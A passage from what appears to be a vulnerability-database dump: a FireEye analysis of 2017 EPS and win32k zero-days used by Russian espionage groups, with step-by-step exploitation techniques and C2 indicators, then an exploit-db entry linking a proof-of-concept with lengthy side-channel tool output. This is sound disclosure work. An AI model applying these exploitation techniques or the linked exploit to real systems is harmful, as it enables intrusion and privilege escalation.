([CVE-2017-0261](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0261>)), and [APT28](<https://www.fireeye.com/blog/threat-research/2014/10/apt28-a-window-into-russias-cyber-espionage-operations.html>) was using the second EPS zero-day ([CVE-2017-0262](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0262>)) along with a new Escalation of Privilege (EOP) zero-day ([CVE-2017-0263](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0263>)). Turla and APT28 are Russian cyber espionage groups that have used these zero-days against European diplomatic and military entities. The unidentified financial group targeted regional and global banks with offices in the Middle East. The following is a description of the EPS zero-days, associated malware, and the new EOP zero-day. Each EPS zero-day is accompanied by an EOP exploit, with the EOP being required to escape the sandbox that executes the FLTLDR.EXE instance used for EPS processing.\n\nThe malicious documents have been used to deliver three different payloads. CVE-2017-0261 was used to deliver SHIRIME (Turla) and NETWIRE (unknown financially motivated actor), and CVE-2017-0262 was used to deliver GAMEFISH (APT28). CVE-2017-0263 is used to escalate privileges during the delivery of the GAMEFISH payload.\n\nFireEye [email](<https://www.fireeye.com/products/ex-email-security-products.html>) and [network](<https://www.fireeye.com/products/nx-network-security-products.html>) products detected the malicious documents.\n\nFireEye has been coordinating with the Microsoft Security Response Center (MSRC) for the responsible disclosure of this information. Microsoft advises all customers to follow the guidance in [security advisory ADV170005](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV170005>) as a defense-in-depth measure against EPS filter vulnerabilities.\n\n#### CVE-2017-0261 \u2013 EPS _\"restore\"_ Use-After-Free\n\nUpon opening the Office document, the FLTLDR.EXE is utilized to render an embedded EPS image, which contains the exploit. The EPS file is a PostScript program, which leverages a Use-After-Free vulnerability in \u201c_restore_\u201d operand.\n\nFrom the [PostScript Manual](<https://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf>): \u201cAllocations in local VM and modifications to existing objects in local VM are subject to a feature called **save** and **restore**, named after the operators that invoke it. **save** and **restore** bracket a section of a PostScript language program whose local VM activity is to be encapsulated. **restore** deallocates new objects and undoes modifications to existing objects that were made since the matching **save**.\u201d\n\nAs the manual described, the _restore_ operator will reclaim memory allocated since the _save_ operator. This makes a perfect condition of Use-After-Free, when combined with _forall_ operator. Figure 1 shows the pseudo code to exploit the save and restore operation.\n\nFigure 1: Pseudo code for the exploit\n\nThe following operations allow the Pseudo code to leak metadata enabling a read/write primitive:\n\n 1. forall_proc array is created with a single element of the restore proc\n 2. The EPS state is **_saved_** to eps_state\n 3. uaf_array is created after the save\n 4. The forall operator loops over the elements of the uaf_array calling forall_proc for each element\n 5. The first element of uaf_array is passed to a call of restore_proc, the procedure contained in forall_proc\n 6. restore_proc\n * **_restores_** the initial state freeing the uaf_array\n * The alloc_string procedure reclaims the freed uaf_array\n * The forall_proc is updated to call leak_proc\n 7. Subsequent calls by the forall operator call the leak_proc on each element of the reclaimed uaf_array which elements now contain the result of the alloc_string procedure\n\nFigure 2 demonstrates a debug log of the uaf_array being used after being reclaimed.\n\nFigure 2: uaf_array reclaimed debug log\n\nBy manipulating the operations after the _save_ operator, the attacker is able to manipulate the memory layouts and convert the Use-After-Free to create a read/write primitive. Figure 3 shows the faked string, with length set as 0x7fffffff, base as 0.\n\nFigure 3: Faked String Object\n\nLeveraging the power of reading and writing arbitrary user memory, the EPS program continues by searching for gadgets to build the ROP chain, and creates a **_file_** object. Figure 4 demonstrates the faked file object in memory.\n\nFigure 4: Fake File Object, with ROP\n\nBy calling **_closefile_** operand with the faked file object, the exploit pivots to the ROP and starts the shellcode. Figure 5 shows part of the disassembler of **_closefile_** operand handler.\n\nFigure 5: Stack Pivot disassembler of closefile\n\nOnce execution has been achieved, the malware uses the ROP chain to change the execution protection of the memory region containing the shellcode. At this point, the shellcode is running within a sandbox that was executing FLTLDR.EXE and an escalation of privilege is required to escape that sandbox.\n\nFireEye detected two different versions of the EPS program exploiting this vulnerability. The first, st07383.en17.docx, continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME. SHIRIME is one of multiple custom JavaScript implants used by Turla as a first stage payload to conduct initial profiling of a target system and implement command and control. Since early 2016, we have observed multiple iterations of SHIRIME used in the wild, having the most recent version (v1.0.1004) employed in this zero-day\n\nThe second document, Confirmation_letter.docx, continues by utilizing 32 or 64 bit versions of CVE-2016-7255 to escalate privilege before dropping a new variant of the NETWIRE malware family. Several versions of this document were seen with similar filenames.\n\nThe EPS programs contained within these documents contained different logic to perform the construction of the ROP chain as well as build the shellcode. The first took the additional step of using a simple algorithm, shown in Figure 6, to obfuscate sections of the shellcode.\n\nFigure 6: Shellcode obfuscation algorithm\n\n#### CVE-2017-0262 \u2013 Type Confusion in EPS\n\nThe second EPS vulnerability is a type confused procedure object of forall operator that can alter the execution flow allowing an attacker to control values onto the operand stack. This vulnerability was found in a document named \u201cTrump's_Attack_on_Syria_English.docx\u201d.\n\nBefore triggering the vulnerability, the EPS program sprays the memory with predefined data to occupy specific memory address and facilitate the exploitation. Figure 7 demonstrates the PostScript code snippet of spraying memory with a string.\n\nFigure 7: PostScript code snippet of spray\n\nAfter execution, the content of string occupies the memory at address 0x0d80d000, leading to the memory layout as shown in Figure 8. The exploit leverages this layout and the content to forge a procedure object and manipulate the code flow to store predefined value, in yellow, to the operator stack.\n\nFigure 8: Memory layout of the sprayed data\n\nAfter spraying the heap, the exploit goes on to call a code statement in the following format: _1 array 16#D80D020 forall_. It creates an Array object, sets the procedure as the hex number 0xD80D020, and calls the _forall_ operator. During the operation of the forged procedure within _forall_ operator, it precisely controls the execution flow to store values of the attacker's choices to operand stack. Figure 9 shows the major code flow consuming the forged procedure.\n\nFigure 9: Consuming the forged procedure\n\nAfter execution of _forall_, the contents on the stack are under the attacker's control. This is s shown in Figure 10.\n\nFigure 10: Stack after the forall execution\n\nSince the operand stack has been manipulated, the subsequent operations of _exch_ defines objects based on the data from the manipulated stack, as shown in Figure 11.\n\nFigure 11: Subsequent code to retrieve data from stack\n\nThe A18 is a string type object, which has a length field of 0x7ffffff0, based from 0. Within memory, the layout as shown in Figure 12.\n\nFigure 12: A18 String Object\n\nThe A19 is an array type object, with member values all purposely crafted. The exploit defines another array object and puts it into the forged array A19. By performing these operations, it puts the newly created array object pointer into A19. The exploit can then directly read the value from the predictable address, 0xD80D020 + 0x38, and leak its vftable and infer module base address of EPSIMP32.flt. Figure 13 shows code snippets of leaking EPSIMP32 base address.\n\nFigure 13: Code snippet of leaking module base\n\nFigure 14 shows the operand stack of calling _put_ operator and the forged Array A19 after finishing the _put_ operation.\n\nFigure 14: Array A19 after the put operation\n\nBy leveraging the RW primitive string and the leaked module base of EPSIMP32, the exploit continues by searching ROP gadgets, creating a fake file object, and pivoting to shellcode through the _bytesavailable_ operator. Figure 15 shows the forged file type object and disassembling of pivoting to ROP and shellcode.\n\nFigure 15: Pivots to ROP and Shellcode\n\nThe shellcode continues by using a previously unknown EOP, CVE-2017-0263, to escalate privileges to escape the sandbox running FLTLDR.EXE, and then drop and execute a GAMEFISH payload. Only a 32-bit version of CVE-2017-0263 is contained in the shellcode.\n\n#### CVE-2017-0263 \u2013 win32k!xxxDestroyWindow Use-After-Free\n\nThe EOP Exploit setup starts by suspending all threads other than the current thread and saving the thread handles to a table, as shown in Figure 16.\n\n\n\nFigure 16: Suspending Threads\n\nThe exploit then checks for OS version and uses that information to populate version specific fields such as token offset, syscall number, etc. An executable memory area is allocated and populated with kernel mode shellcode as wells as address information required by the shellcode. A new thread is created for triggering the vulnerability and further control of exploitation.\n\nThe exploit starts by creating three PopupMenus and appending menus to them, as shown in Figure 17. The exploit creates 0x100 windows with random classnames. The User32!HMValidateHandle trick is used to leak the tagWnd address, which is used as kernel information leak throughout the exploit.\n\nFigure 17: Popup menu creation\n\nRegisterClassExW is then used to register a window class \u201cMain_Window_Class\u201d with a WndProc pointing to a function, which calls DestroyWindow on window table created by EventHookProc, explained later in the blog. This function also shows the first popup menu, which was created earlier.\n\nTwo extra windows are created with class name as \u201cMain_Window_Class\u201d. SetWindowLong is used to change WndProc of second window, wnd2, to a shellcode address. An application defined hook, WindowHookProc, and an event hook, EventHookProc, are installed by SetWindowsHookExW and SetWinEventHook respectively. PostMessage is used to post 0xABCD to first window, wnd1.\n\nThe EventHookProc waits for EVENT_SYSTEM_MENUPOPUPSTART and saves the window\u2019s handle to a table. WindowHookProc looks for **SysShadow **classname and sets a new WndProc for the corresponding window. Inside this WndProc, NtUserMNDragLeave syscall is invoked and SendMessage is used to send 0x9f9f to wnd2, invoking the shellcode shown in Figure 18.\n\n\n\nFigure 18: Triggering the shellcode\n\nThe Use-After-Free happens inside WM_NCDESTROY event in kernel and overwrites wnd2\u2019s tagWnd structure, which sets bServerSideWindowProc flag. With bServerSideWindowProc set, the user mode WndProc is considered as a kernel callback and will be invoked from kernel context \u2013 in this case wnd2\u2019s WndProc is the shellcode.\n\nThe shellcode checks whether the memory corruption has occurred by checking if the code segment is not the user mode code segment. It also checks whether the message sent is 0x9f9f. Once the validation is completed, shellcode finds the TOKEN address of current process and TOKEN of system process (pid 4). The shellcode then copies the system process\u2019 token to current process, which elevates current process privilege to SYSTEM.\n\n#### Conclusion\n\n_EPS processing has become a ripe exploitation space for attackers._\n\nFireEye has discovered and analyzed two of these recent EPS zero-days with examples seen before and after Microsoft disabled EPS processing in the April 2017 Patch Tuesday. The documents explored utilize differing EPS exploits, ROP construction, shellcode, EOP exploits and final payloads. While these documents are detected by FireEye appliances, users should exercise caution because FLTLDR.EXE is not monitored by EMET.\n\n_Russian cyber espionage is a well-resourced, dynamic threat_\n\nThe use of zero-day exploits by Turla Group and APT28 underscores their capacity to apply technically sophisticated and costly methods when necessary. Russian cyber espionage actors use zero-day exploits in addition to less complex measures. Though these actors have relied on credential phishing and macros to carry out operations previously, the use of these methods does not reflect a lack of resources. Rather, the use of less technically sophisticated methods \u2013 when sufficient \u2013 reflects operational maturity and the foresight to protect costly exploits until they are necessary.\n\n_A vibrant ecosystem of threats_\n\nCVE-2017-0261\u2019s use by multiple actors is further evidence that cyber espionage and criminal activity exist in a shared ecosystem. Nation state actors, such as those leveraging [CVE-2017-0199 to distribute FINSPY](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.html>), often rely on the same sources for exploits as criminal actors. This shared ecosystem creates a proliferation problem for defenders concerned with either type of threat.\n\nCVE-2017-0261 was being used as a zero-day by both nation state and cyber crime actors, and we believe that both actors obtained the vulnerability from a common source. Following [CVE-2017-0199](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>), this is the second major vulnerability in as many months that has been used for both espionage and crime.\n\n**MD5**\n\n| \n\n**Filename**\n\n| \n\n**C2 Host** \n \n---|---|--- \n \n2abe3cc4bff46455a945d56c27e9fb45\n\n| \n\nConfirmation_letter.docx.bin\n\n(NETWIRE)\n\n| \n\n84.200.2.12 \n \ne091425d23b8db6082b40d25e938f871\n\n| \n\nConfirmation_letter.docx\n\n(NETWIRE)\n\n| \n\n138.201.44.30 \n \n006bdb19b6936329bffd4054e270dc6a\n\n| \n\nConfirmation_letter_ACM.docx\n\n(NETWIRE)\n\n| \n\n185.106.122.113 \n \n15660631e31c1172ba5a299a90938c02\n\n| \n\nst07383.en17.docx\n\n(SHIRIME)\n\n| \n\ntnsc.webredirect.org \n \nf8e92d8b5488ea76c40601c8f1a08790\n\n| \n\nTrump's_Attack_on_Syria_English.docx\n\n(GAMEFISH)\n\n| \n\nwmdmediacodecs.com \n \nTable 1: Source Exploit Documents\n\nTable 2: CVEs related to these attacks\n\n#### Acknowledgements\n\niSIGHT Intelligence Team, FLARE Team, FireEye Labs, Microsoft Security Response Center (MSRC).\n", "modified": "2017-05-09T13:00:00", "published": "2017-05-09T13:00:00", "id": "FIREEYE:35D0439B3D476357F4D2F51F3D5CD294", "href": "https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html", "type": "fireeye", "title": "EPS Processing Zero-Days Exploited by Multiple Threat Actors ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-11-24T17:23:17", "description": "Microsoft Windows Kernel win32k.sys - 'NtSetWindowLongPtr' Privilege Escalation (MS16-135). CVE-2016-7255. Local exploit for Windows platform", "published": "2016-11-24T00:00:00", "type": "exploitdb", "title": "Microsoft Windows Kernel win32k.sys - 'NtSetWindowLongPtr' Privilege Escalation (MS16-135)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7255"], "modified": "2016-11-24T00:00:00", "id": "EDB-ID:40823", "href": "https://www.exploit-db.com/exploits/40823/", "sourceData": "Complete Proof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40823.zip\r\n\r\nPresentation:\r\nhttps://www.exploit-db.com/docs/40822.pdf\r\n\r\n\r\nI Know Where Your Page Lives: Derandomizing the latest Windows 10 Kernel - ZeroNights 2016\r\n\r\nRequirements\r\n\r\nIntel Processor (Haswell or newer)\r\nWindows 10 x64\r\nUsage\r\n\r\nRun ASLRSideChannelAttack.exe to get the PML4-Self-Ref entry:\r\n\r\nC:\\Users\\qa\\Desktop>ASLRSideChannelAttack.exe\r\n+] Setting thread affinity to CPU 0\r\n+] Getting all the potential PML4 SelfRef\r\n+] Mapping a page oracle\r\n+] Allocating probing target pages...\r\nAllocation 0: 0000020E339D0000\r\nAllocation 1: 0000020E339E0000\r\nAllocation 2: 0000020E339F0000\r\nAllocation 3: 0000020E33A00000\r\nAllocation 4: 0000020E33A10000\r\n--------------------------\r\n+] Check that Unammped and Mapped values are consistent across several executions!\r\n--------------------------\r\nUnmapped Initial: 256.683746\r\nMapped Initial: 203.692978\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 247.440018\r\nMapped: 202.827560\r\n--------------------------\r\n\r\nPotential SelfRef: FFFF8140A0502810\r\n+] PTE FFFF81010719CE80 looks mapped! - Time: 207.127213\r\n+] PTE FFFF81010719CF00 looks mapped! - Time: 195.239563\r\n+] PTE FFFF81010719CF80 looks mapped! - Time: 192.401382\r\n+] PTE FFFF81010719D000 looks mapped! - Time: 197.297256\r\n+] PTE FFFF81010719D080 looks mapped! - Time: 194.501175\r\n+] PTE FFFF810804020100 looks mapped! - Time: 204.740097\r\n+] Removing 102 from initial array and pushing it into final array\r\nPotential SelfRef: FFFF81C0E0703818\r\n+] PTE FFFF81810719CE80 looks mapped! - Time: 200.837616\r\n+] PTE FFFF81810719CF00 looks mapped! - Time: 207.868774\r\n+] PTE FFFF81810719CF80 looks mapped! - Time: 208.949921\r\n+] PTE FFFF81810719D000 looks mapped! - Time: 202.525726\r\n+] PTE FFFF81810719D080 looks mapped! - Time: 208.673874\r\nTime difference exceed for ffff818804020100, retrying...\r\n+] PTE FFFF818804020100 looks mapped! - Time: 209.071213\r\n+] Removing 103 from initial array and pushing it into final array\r\nTime difference exceed for ffff824120904820, retrying...\r\nPotential SelfRef: FFFF824120904820\r\n+] PTE FFFF82010719CE80 looks mapped! - Time: 198.373642\r\nTime difference exceed for ffff82010719cf00, retrying...\r\n+] PTE FFFF82010719CF00 looks mapped! - Time: 206.213593\r\n+] PTE FFFF82010719CF80 looks mapped! - Time: 210.637344\r\n+] PTE FFFF82010719D000 looks mapped! - Time: 207.820862\r\n+] PTE FFFF82010719D080 looks mapped! - Time: 197.229263\r\n+] PTE FFFF820804020100 looks mapped! - Time: 204.585739\r\n+] Removing 104 from initial array and pushing it into final array\r\nPotential SelfRef: FFFF82C160B05828\r\n+] PTE FFFF82810719CE80 looks mapped! - Time: 216.981003\r\nTime difference exceed for ffff8341a0d06830, retrying...\r\nPotential SelfRef: FFFF8341A0D06830\r\n+] PTE FFFF83010719CE80 looks mapped! - Time: 201.957657\r\n+] PTE FFFF83010719CF00 looks mapped! - Time: 202.023697\r\n+] PTE FFFF83010719CF80 looks mapped! - Time: 212.651016\r\n+] PTE FFFF83010719D000 looks mapped! - Time: 214.013504\r\n+] PTE FFFF83010719D080 looks mapped! - Time: 191.688126\r\n+] PTE FFFF830804020100 looks mapped! - Time: 193.314758\r\n+] Removing 106 from initial array and pushing it into final array\r\nPotential SelfRef: FFFF83C1E0F07838\r\n+] PTE FFFF83810719CE80 looks mapped! - Time: 195.506973\r\n+] PTE FFFF83810719CF00 looks mapped! - Time: 193.697693\r\n+] PTE FFFF83810719CF80 looks mapped! - Time: 208.809097\r\n+] PTE FFFF83810719D000 looks mapped! - Time: 216.298660\r\n+] PTE FFFF83810719D080 looks mapped! - Time: 203.848816\r\n+] PTE FFFF838804020100 looks mapped! - Time: 204.008743\r\n+] Removing 107 from initial array and pushing it into final array\r\nTime difference exceed for ffff89c4e2713898, retrying...\r\nTime difference exceed for ffff8bc5e2f178b8, retrying...\r\nTime difference exceed for ffff8c46231188c0, retrying...\r\nUnmapped Initial: 248.508636\r\nMapped Initial: 207.139847\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 236.360733\r\nMapped: 195.650040\r\n--------------------------\r\n\r\nPotential SelfRef: FFFF8140A0502810\r\n+] PTE FFFF81010719CE80 looks mapped! - Time: 197.312363\r\nPotential SelfRef: FFFF81C0E0703818\r\nTime difference exceed for ffff81810719ce80, retrying...\r\nTime difference exceed for ffff81810719ce80, retrying...\r\nTime difference exceed for ffff81810719ce80, retrying...\r\nTime difference exceed for ffff81810719ce80, retrying...\r\n+] PTE FFFF81810719CE80 looks mapped! - Time: 209.812393\r\nTime difference exceed for ffff81810719cf00, retrying...\r\n+] PTE FFFF81810719CF00 looks mapped! - Time: 207.951645\r\n+] PTE FFFF81810719CF80 looks mapped! - Time: 200.001724\r\n+] PTE FFFF81810719D000 looks mapped! - Time: 197.655167\r\n+] PTE FFFF81810719D080 looks mapped! - Time: 201.667160\r\n+] PTE FFFF818804020100 looks mapped! - Time: 195.728439\r\nPML4e: FFFF8140A0502810 - Index: 102\r\nPML4e: FFFF81C0E0703818 - Index: 103\r\nPML4e: FFFF824120904820 - Index: 104\r\nPML4e: FFFF8341A0D06830 - Index: 106\r\nPML4e: FFFF83C1E0F07838 - Index: 107\r\nKNOWN_UNMAPPED PTE: ffff818000000000\r\n-] Erasing 103 from final array\r\nPotential SelfRef: FFFF824120904820\r\n+] PTE FFFF82010719CE80 looks mapped! - Time: 206.883759\r\n+] PTE FFFF82010719CF00 looks mapped! - Time: 208.451019\r\n+] PTE FFFF82010719CF80 looks mapped! - Time: 201.073364\r\n+] PTE FFFF82010719D000 looks mapped! - Time: 203.052826\r\n+] PTE FFFF82010719D080 looks mapped! - Time: 194.115143\r\n+] PTE FFFF820804020100 looks mapped! - Time: 198.158585\r\nPML4e: FFFF8140A0502810 - Index: 102\r\nPML4e: FFFF824120904820 - Index: 104\r\nPML4e: FFFF8341A0D06830 - Index: 106\r\nPML4e: FFFF83C1E0F07838 - Index: 107\r\nKNOWN_UNMAPPED PTE: ffff820000000000\r\n-] Erasing 104 from final array\r\nPotential SelfRef: FFFF8341A0D06830\r\n+] PTE FFFF83010719CE80 looks mapped! - Time: 200.405823\r\n+] PTE FFFF83010719CF00 looks mapped! - Time: 201.572525\r\n+] PTE FFFF83010719CF80 looks mapped! - Time: 193.538040\r\n+] PTE FFFF83010719D000 looks mapped! - Time: 196.066254\r\n+] PTE FFFF83010719D080 looks mapped! - Time: 189.007034\r\n+] PTE FFFF830804020100 looks mapped! - Time: 197.613953\r\nPML4e: FFFF8140A0502810 - Index: 102\r\nPML4e: FFFF8341A0D06830 - Index: 106\r\nPML4e: FFFF83C1E0F07838 - Index: 107\r\nKNOWN_UNMAPPED PTE: ffff830000000000\r\n-] Erasing 106 from final array\r\nPotential SelfRef: FFFF83C1E0F07838\r\n+] PTE FFFF83810719CE80 looks mapped! - Time: 200.655380\r\nTime difference exceed for ffff83810719cf00, retrying...\r\nTime difference exceed for ffff83810719cf00, retrying...\r\nUnmapped Initial: 232.123840\r\nMapped Initial: 196.420654\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 234.845581\r\nMapped: 187.862518\r\n--------------------------\r\n\r\nPotential SelfRef: FFFF8140A0502810\r\n+] PTE FFFF81010719CE80 looks mapped! - Time: 197.432938\r\n+] PTE FFFF81010719CF00 looks mapped! - Time: 191.731766\r\nTime difference exceed for ffff81010719cf80, retrying...\r\nTime difference exceed for ffff81010719cf80, retrying...\r\nTime difference exceed for ffff81010719cf80, retrying...\r\n+] PTE FFFF81010719CF80 looks mapped! - Time: 201.003784\r\n+] PTE FFFF81010719D000 looks mapped! - Time: 194.332733\r\n+] PTE FFFF81010719D080 looks mapped! - Time: 200.211182\r\n+] PTE FFFF810804020100 looks mapped! - Time: 199.812225\r\nPML4e: FFFF8140A0502810 - Index: 102\r\nPML4e: FFFF83C1E0F07838 - Index: 107\r\nKNOWN_UNMAPPED PTE: ffff810000000000\r\nTime difference exceed for ffff810000000000, retrying...\r\n-] Erasing 102 from final array\r\nTime difference exceed for ffff83c1e0f07838, retrying...\r\nPotential SelfRef: FFFF83C1E0F07838\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nUnmapped Initial: 230.247162\r\nMapped Initial: 198.023987\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 235.923035\r\nMapped: 191.605301\r\n--------------------------\r\n\r\nTime difference exceed for ffff83c1e0f07838, retrying...\r\nTime difference exceed for ffff83c1e0f07838, retrying...\r\nPotential SelfRef: FFFF83C1E0F07838\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nUnmapped Initial: 258.041046\r\nMapped Initial: 210.309753\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 238.757538\r\nMapped: 203.896240\r\n--------------------------\r\n\r\nPotential SelfRef: FFFF83C1E0F07838\r\n+] PTE FFFF83810719CE80 looks mapped! - Time: 210.036102\r\n+] PTE FFFF83810719CF00 looks mapped! - Time: 199.200836\r\n+] PTE FFFF83810719CF80 looks mapped! - Time: 204.575333\r\n+] PTE FFFF83810719D000 looks mapped! - Time: 197.218445\r\n+] PTE FFFF83810719D080 looks mapped! - Time: 203.334763\r\n+] PTE FFFF838804020100 looks mapped! - Time: 203.243607\r\nPML4e: FFFF83C1E0F07838 - Index: 107\r\nKNOWN_UNMAPPED PTE: ffff838000000000\r\n-] Erasing 107 from final array\r\nPotential SelfRef: FFFF82C160B05828\r\n+] PTE FFFF82810719CE80 looks mapped! - Time: 201.889221\r\n+] PTE FFFF82810719CF00 looks mapped! - Time: 201.679138\r\n+] PTE FFFF82810719CF80 looks mapped! - Time: 204.281006\r\n+] PTE FFFF82810719D000 looks mapped! - Time: 209.909943\r\n+] PTE FFFF82810719D080 looks mapped! - Time: 202.795639\r\n+] PTE FFFF828804020100 looks mapped! - Time: 196.754044\r\n+] Removing 105 from initial array and pushing it into final array\r\nTime difference exceed for ffff884422110880, retrying...\r\nTime difference exceed for ffff884422110880, retrying...\r\nTime difference exceed for ffff8ec763b1d8e8, retrying...\r\nTime difference exceed for ffff8ec763b1d8e8, retrying...\r\nTime difference exceed for ffff8ec763b1d8e8, retrying...\r\nTime difference exceed for ffff8ec763b1d8e8, retrying...\r\nTime difference exceed for ffff90c864321908, retrying...\r\nUnmapped Initial: 257.754272\r\nMapped Initial: 207.903702\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 247.145935\r\nMapped: 207.792923\r\n--------------------------\r\n\r\nPotential SelfRef: FFFF82C160B05828\r\n+] PTE FFFF82810719CE80 looks mapped! - Time: 208.554092\r\n+] PTE FFFF82810719CF00 looks mapped! - Time: 206.517715\r\n+] PTE FFFF82810719CF80 looks mapped! - Time: 216.576614\r\n+] PTE FFFF82810719D000 looks mapped! - Time: 213.698837\r\n+] PTE FFFF82810719D080 looks mapped! - Time: 210.162796\r\n+] PTE FFFF828804020100 looks mapped! - Time: 208.765045\r\nPML4e: FFFF82C160B05828 - Index: 105\r\nKNOWN_UNMAPPED PTE: ffff828000000000\r\n-] Erasing 105 from final array\r\n-] Removing 100 as it seems to be unmapped\r\n-] Removing 101 as it seems to be unmapped\r\n-] Removing 108 as it seems to be unmapped\r\n-] Removing 109 as it seems to be unmapped\r\n-] Removing 10a as it seems to be unmapped\r\n-] Removing 10b as it seems to be unmapped\r\n-] Removing 10c as it seems to be unmapped\r\n-] Removing 10d as it seems to be unmapped\r\nTime difference exceed for ffff8743a1d0e870, retrying...\r\n-] Removing 10e as it seems to be unmapped\r\n-] Removing 10f as it seems to be unmapped\r\n-] Removing 110 as it seems to be unmapped\r\nTime difference exceed for ffff88c462311888, retrying...\r\n-] Removing 111 as it seems to be unmapped\r\n-] Removing 112 as it seems to be unmapped\r\n-] Removing 113 as it seems to be unmapped\r\nTime difference exceed for ffff8a45229148a0, retrying...\r\n-] Removing 114 as it seems to be unmapped\r\n-] Removing 115 as it seems to be unmapped\r\n-] Removing 116 as it seems to be unmapped\r\n-] Removing 117 as it seems to be unmapped\r\nTime difference exceed for ffffbc5e2f178bc0, retrying...\r\nTime difference exceed for ffffbc5e2f178bc0, retrying...\r\nTime difference exceed for ffffe8f47a3d1e88, retrying...\r\nPotential SelfRef: FFFFF67B3D9ECF60\r\n+] PTE FFFFF6010719CE80 looks mapped! - Time: 201.963379\r\n+] PTE FFFFF6010719CF00 looks mapped! - Time: 212.917694\r\n+] PTE FFFFF6010719CF80 looks mapped! - Time: 207.448502\r\n+] PTE FFFFF6010719D000 looks mapped! - Time: 203.673920\r\n+] PTE FFFFF6010719D080 looks mapped! - Time: 206.782059\r\n+] PTE FFFFF60804020100 looks mapped! - Time: 211.636246\r\n+] Removing 1ec from initial array and pushing it into final array\r\nUnmapped Initial: 233.678802\r\nMapped Initial: 214.496124\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 250.585373\r\nMapped: 213.339661\r\n--------------------------\r\n\r\nPotential SelfRef: FFFFF67B3D9ECF60\r\n+] PTE FFFFF6010719CE80 looks mapped! - Time: 201.419174\r\n+] PTE FFFFF6010719CF00 looks mapped! - Time: 199.196457\r\n+] PTE FFFFF6010719CF80 looks mapped! - Time: 210.779861\r\n+] PTE FFFFF6010719D000 looks mapped! - Time: 199.642334\r\n+] PTE FFFFF6010719D080 looks mapped! - Time: 200.348160\r\n+] PTE FFFFF60804020100 looks mapped! - Time: 204.036926\r\nPML4e: FFFFF67B3D9ECF60 - Index: 1ec\r\nKNOWN_UNMAPPED PTE: fffff60000000000\r\nReal PML4 SelfRef Found: fffff67b3d9ecf60\r\nLeft in Potential Array: ffff8c46231188c0\r\nLeft in Potential Array: ffff8cc6633198c8\r\nLeft in Potential Array: ffff8d46a351a8d0\r\nLeft in Potential Array: ffff8dc6e371b8d8\r\nLeft in Potential Array: ffff8e472391c8e0\r\nLeft in Potential Array: ffff8ec763b1d8e8\r\nLeft in Potential Array: ffff8f47a3d1e8f0\r\nLeft in Potential Array: ffff8fc7e3f1f8f8\r\nLeft in Potential Array: ffff904824120900\r\nLeft in Potential Array: ffff90c864321908\r\nLeft in Potential Array: ffff9148a4522910\r\nLeft in Potential Array: ffff91c8e4723918\r\nLeft in Potential Array: ffff924924924920\r\nLeft in Potential Array: ffff92c964b25928\r\nLeft in Potential Array: ffff9349a4d26930\r\nLeft in Potential Array: ffff93c9e4f27938\r\nLeft in Potential Array: ffff944a25128940\r\nLeft in Potential Array: ffff94ca65329948\r\nLeft in Potential Array: ffff954aa552a950\r\nLeft in Potential Array: ffff95cae572b958\r\nLeft in Potential Array: ffff964b2592c960\r\nLeft in Potential Array: ffff96cb65b2d968\r\nLeft in Potential Array: ffff974ba5d2e970\r\nLeft in Potential Array: ffff97cbe5f2f978\r\nLeft in Potential Array: ffff984c26130980\r\nLeft in Potential Array: ffff98cc66331988\r\nLeft in Potential Array: ffff994ca6532990\r\nLeft in Potential Array: ffff99cce6733998\r\nLeft in Potential Array: ffff9a4d269349a0\r\nLeft in Potential Array: ffff9acd66b359a8\r\nLeft in Potential Array: ffff9b4da6d369b0\r\nLeft in Potential Array: ffff9bcde6f379b8\r\nLeft in Potential Array: ffff9c4e271389c0\r\nLeft in Potential Array: ffff9cce673399c8\r\nLeft in Potential Array: ffff9d4ea753a9d0\r\nLeft in Potential Array: ffff9dcee773b9d8\r\nLeft in Potential 